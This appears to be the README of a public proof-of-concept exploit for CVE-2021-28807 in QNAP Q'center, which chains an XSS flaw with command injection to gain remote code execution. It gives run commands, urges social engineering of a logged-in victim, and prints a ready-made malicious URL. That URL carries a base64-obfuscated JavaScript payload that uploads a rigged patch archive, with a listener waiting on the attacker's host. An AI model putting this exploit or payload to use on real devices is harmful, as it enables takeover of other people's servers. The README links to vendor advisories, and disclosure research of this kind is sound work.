QNAP Q'center is affected by a stored XSS and a command injection vulnerabilities, leading to remote command execution once the logged-in victim opens the malicious URL.
Read more at:
- https://www.shielder.it/advisories/qnap-qcenter-virtual-stored-xss/
- https://www.shielder.it/advisories/qnap-qcenter-post-auth-remote-code-execution-via-qpkg/
- Clone this repo
- Run the exploit with the correct arguments, e.g.:
./CVE-2021-28807.py -ip 192.168.153.1 -port 9595 -victimip 192.168.153.128 -reflected y
- Use your favourite social engineering technique to make the logged-in victim open such URL :-)
$ \tmp\poc\CVE-2021-28807> python .\poc.py -ip 192.168.153.1 -port 9595 -victimip 192.168.153.128 -reflected y
[+] created in memory patch.qpkg
[+] created in memory QcenterServerVMAppPatch_1.12.1014 archive
Do you have open the listener on 192.168.153.1:9595 [Y/N]? Y
[+] creating the reflected-XSS payload
https://192.168.153.128/qcenter/redirect.html?redirect=javascript:eval(atob("ZnVuY3Rpb24gYmFzZTY0dG9CbG9iKGJhc2U2NERhdGEsIGNvbnRlbnRUeXBlKSB7IGNvbnRlbnRUeXBlID0gY29udGVudFR5cGUgfHwgJyc7IHZhciBzbGljZVNpemUgPSAxMDI0OyB2YXIgYnl0ZUNoYXJhY3RlcnMgPSBhdG9iKGJhc2U2NERhdGEpOyB2YXIgYnl0ZXNMZW5ndGggPSBieXRlQ2hhcmFjdGVycy5sZW5ndGg7IHZhciBzbGljZXNDb3VudCA9IE1hdGguY2VpbChieXRlc0xlbmd0aCAvIHNsaWNlU2l6ZSk7IHZhciBieXRlQXJyYXlzID0gbmV3IEFycmF5KHNsaWNlc0NvdW50KTsgZm9yICh2YXIgc2xpY2VJbmRleCA9IDA7IHNsaWNlSW5kZXggPCBzbGljZXNDb3VudDsgKytzbGljZUluZGV4KSB7IHZhciBiZWdpbiA9IHNsaWNlSW5kZXggKiBzbGljZVNpemU7IHZhciBlbmQgPSBNYXRoLm1pbihiZWdpbiArIHNsaWNlU2l6ZSwgYnl0ZXNMZW5ndGgpOyB2YXIgYnl0ZXMgPSBuZXcgQXJyYXkoZW5kIC0gYmVnaW4pOyBmb3IgKHZhciBvZmZzZXQgPSBiZWdpbiwgaSA9IDA7IG9mZnNldCA8IGVuZDsgKytpLCArK29mZnNldCkgeyBieXRlc1tpXSA9IGJ5dGVDaGFyYWN0ZXJzW29mZnNldF0uY2hhckNvZGVBdCgwKTsgfSBieXRlQXJyYXlzW3NsaWNlSW5kZXhdID0gbmV3IFVpbnQ4QXJyYXkoYnl0ZXMpOyB9IHJldHVybiBuZXcgQmxvYihieXRlQXJyYXlzLCB7IHR5cGU6IGNvbnRlbnRUeXBlIH0pOyB9IHZhciB1cmwgPSAnaHR0cHM6XC9cLzE5Mi4xNjguMTUzLjEyOFwvcWNlbnRlclwvaGF3a2V5ZVwvdjFcL3BhdGNoP3VwbG9hZCc7dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignUE9TVCcsIHVybCwgdHJ1ZSk7dmFyIGNvbnRlbnRfdHlwZSA9ICdhcHBsaWNhdGlvbi94LWd6aXAnOyB2YXIgYmxvYiA9IGJhc2U2NHRvQmxvYigiSDRzSUNDNUkwMkFDLzFGalpXNTBaWEpUWlhKMlpYSldUVUZ3Y0ZCaGRHTm9YekV1TVRJdU1UQXhOQUR0MGJ0S0EwRVVCdUFSTFNUaUd3aE8xc0pkMkV4Mm9ra01pMmlRZUNGNGlVa1hWT0s2bWlYSnpyb3pBUlVSTEt6c0JWL0d5Z2NRMzhES1Fpd3RySFF4OFlMYWlUYitYM1BtL00yY014UFVsRk5udTBGamgvd2FLNUlaSDMrcGtjL1Z5bVRTYitkT25zMk9aUW0xeUI5b1MxVUxveXZKL3pRU1QyNTZmbExXWThHK3FndWZKaHc2NnJVQ0VTb3FoZE53bFNuYm0wRW9IRmRLVTBoYlRuWmkxaWw2dDh2UGJpd3NGU3BtdHkwdnp4UTN5cFhWUW43UnNDVnpoTys3anRKMWplZFNqR2NtR0UrUE1hNlp1WFF1YlJpMmtHeXJIYVIweWJhOXB1c0wzVEF0dzZiZnhQejdPR1hZd2VUN29NeXBOWnQ2VmV2dXBwbGF3dFBXREhzMDV1NTVpbklyRmsya1F0RmswZWV6bllPdjd6SjgyazhHSHQxMTBudC9YVzJzblozMEhNZHY1dnVHVHFiamcvR251L1BMajQ0dXBzamg3VU9WWExYNjZRK1VITmRYYnBpb0ZNcVYxNHd6YnJHc2xlSzB0SlJmS2EwVTV5Z2xBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFoRHdESmxkUzdnQW9BQUE9IiwgY29udGVudF90eXBlKTt2YXIgZm9ybURhdGEgPSBuZXcgRm9ybURhdGEoKTtmb3JtRGF0YS5hcHBlbmQoJ3Bhc3N3ZCcsICdZV0ZoWVdGaCcpO2Zvcm1EYXRhLmFwcGVuZCgnYnJvd3NlX2ZpbGUnLCBibG9iLCdRY2VudGVyU2VydmVyVk1BcHBQYXRjaF8xLjEwLjkwMDEuZ3onKTt4aHIuc2VuZChmb3JtRGF0YSk7"));
- zi0Black of Shielder for vulnerabilities discovery and exploit development.